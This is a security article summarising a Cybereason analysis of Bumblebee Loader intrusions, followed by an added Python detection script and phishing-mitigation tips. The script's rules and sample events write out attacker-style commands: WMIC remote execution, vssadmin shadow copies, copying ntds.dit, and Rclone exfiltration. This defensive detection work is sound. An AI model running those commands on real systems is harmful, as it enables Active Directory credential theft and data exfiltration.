The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader. In the analysis, they detailed how the attackers were able to compromise the entire network. Most Bumblebee infections started with users executing LNK files, which use a system binary to load the malware. The malware is distributed through phishing messages carrying a malicious attachment or a link to a malicious archive containing Bumblebee.
If the victim executes malicious files, Bumblebee can be used to perform various post-exploitation actions including:
- privilege escalation
- credential theft
Threat actors were seen conducting extensive reconnaissance and redirecting the output of executed commands to files for later exfiltration. Bumblebee has been active since March 2022, when Google’s Threat Analysis Group (TAG) spotted that cybercriminal groups previously using BazaLoader and IcedID in their malware campaigns had switched to the Bumblebee loader.
Cybereason says the threat actors have transitioned from BazarLoader, TrickBot, and IcedID to Bumblebee. Because Bumblebee is still under active development, many threat actors have made it their loader of choice. Many Bumblebee operators also make use of Cobalt Strike and use stolen credentials to access Active Directory. After making a copy of ntds.dit (which contains data for the entire Active Directory), threat actors use or create a domain admin account to move laterally, create local user accounts, and exfiltrate data using the Rclone software.
Bumblebee accesses remote Active Directory machines using the Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin commands. As mentioned above, the threat actor also steals the ntds.dit file from the domain controller; it contains information about user objects, groups and group membership, and also stores the password hashes for all users in the domain. In many cases, the threat actors took as little as two days to move from initial access to Active Directory compromise.
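The two paragraphs above name the observable steps of the post-exploitation chain: remote process execution through WMIC, a vssadmin shadow copy on the domain controller, a copy of ntds.dit, and Rclone for exfiltration. The following detection example is added here and is not code from the Cybereason report; it runs a small rule set over Windows process-creation events and grades each host. The rule regexes, the event field names (`host`, `image`, `cmd`), the allowlist path and the sample telemetry are all constructed for this example and would need tuning against real data.

```python
"""Added detection example (not from the Cybereason report): scan Windows
process-creation events for the post-exploitation steps the article
attributes to Bumblebee operators and grade each host's findings."""
import re
from collections import defaultdict

# One regex per detection, keyed by rule name. Patterns are assumptions
# written for this example; tune them to your own telemetry.
RULES = {
    # WMIC used to start a process on another machine (lateral movement)
    "remote_wmic_exec": re.compile(
        r"\bwmic(?:\.exe)?\b.*?/node:\S+.*?\bprocess\b.*?\bcall\b.*?\bcreate\b", re.I),
    # vssadmin creating a shadow copy (precursor to copying locked files);
    # "vssadmin list shadows" deliberately does not match
    "shadow_copy_created": re.compile(
        r"\bvssadmin(?:\.exe)?\b.*?\bcreate\b.*?\bshadow\b", re.I),
    # any command line that names the AD database file
    "ntds_dit_access": re.compile(r"ntds\.dit", re.I),
    # Rclone moving data somewhere (exfiltration)
    "rclone_exfil": re.compile(
        r"\brclone(?:\.exe)?\b.*?\b(?:copy|copyto|sync|move)\b", re.I),
}

# Images allowed to reference ntds.dit, e.g. a backup agent.
# Placeholder path, constructed for this example.
NTDS_ALLOWLIST = {r"c:\program files\examplebackup\agent.exe"}


def match_event(event):
    """Return the rule names a single event triggers."""
    cmd = event.get("cmd", "")
    image = event.get("image", "").lower()
    hits = []
    for name, pattern in RULES.items():
        if not pattern.search(cmd):
            continue
        if name == "ntds_dit_access" and image in NTDS_ALLOWLIST:
            continue
        hits.append(name)
    return hits


def scan_events(events):
    """Group triggered rules by host, preserving first-seen order."""
    per_host = defaultdict(list)
    for ev in events:
        for name in match_event(ev):
            if name not in per_host[ev["host"]]:
                per_host[ev["host"]].append(name)
    return dict(per_host)


def severity(rule_names):
    """Grade a host: the article says Bumblebee activity is critical once the
    AD database is touched or several chain stages appear on one machine."""
    if "ntds_dit_access" in rule_names or len(rule_names) >= 2:
        return "critical"
    return "high" if rule_names else "none"


def triage(events):
    """Map every host in the event set to (severity, triggered rules)."""
    hosts = {ev["host"] for ev in events}
    found = scan_events(events)
    return {h: (severity(found.get(h, [])), found.get(h, [])) for h in sorted(hosts)}


# Constructed sample telemetry for four hosts; these are not real logs.
SAMPLE_EVENTS = [
    {"host": "WS12", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin list shadows"},                       # benign admin listing
    {"host": "WS03", "image": r"C:\Windows\System32\wmic.exe",
     "cmd": r'wmic /node:DC01 process call create "cmd.exe /c whoami > C:\Temp\r.txt"'},
    {"host": "DC01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin create shadow /for=C:"},
    {"host": "DC01", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c copy C:\Windows\NTDS\ntds.dit C:\Users\Public\n.dit"},
    {"host": "WS07", "image": r"C:\Tools\rclone.exe",
     "cmd": r"rclone.exe copy C:\Share\Finance remote:bucket --transfers 8"},
]

if __name__ == "__main__":
    for host, (sev, rules) in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {sev} {rules}")
```

Grading per host rather than per event is what makes the chain visible: the domain controller is rated critical because the shadow copy and the ntds.dit reference appear together, while the workstation that only ran Rclone is rated high and the host that merely listed shadow copies produces no finding.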
GSOC experts warn that attacks involving Bumblebee must be treated as critical: the attack chain they analyzed allows threat actors to deliver ransomware into the compromised networks.
Tips for Mitigation:
Because the campaign begins with a phishing attack, users should be trained continuously to recognize phishing attempts in order to avoid falling victim to social engineering threats.
- Do not open emails or download software from untrusted sources
- Do not click on links or attachments in emails that come from unknown senders
- Do not supply passwords, personal, or financial information via email to anyone (sensitive information is also used for double extortion)
- Always verify the email sender's email address, name, and domain
- Protect all devices using antivirus, anti-spam and anti-spyware software
- Report phishing emails to the organization's IT staff immediately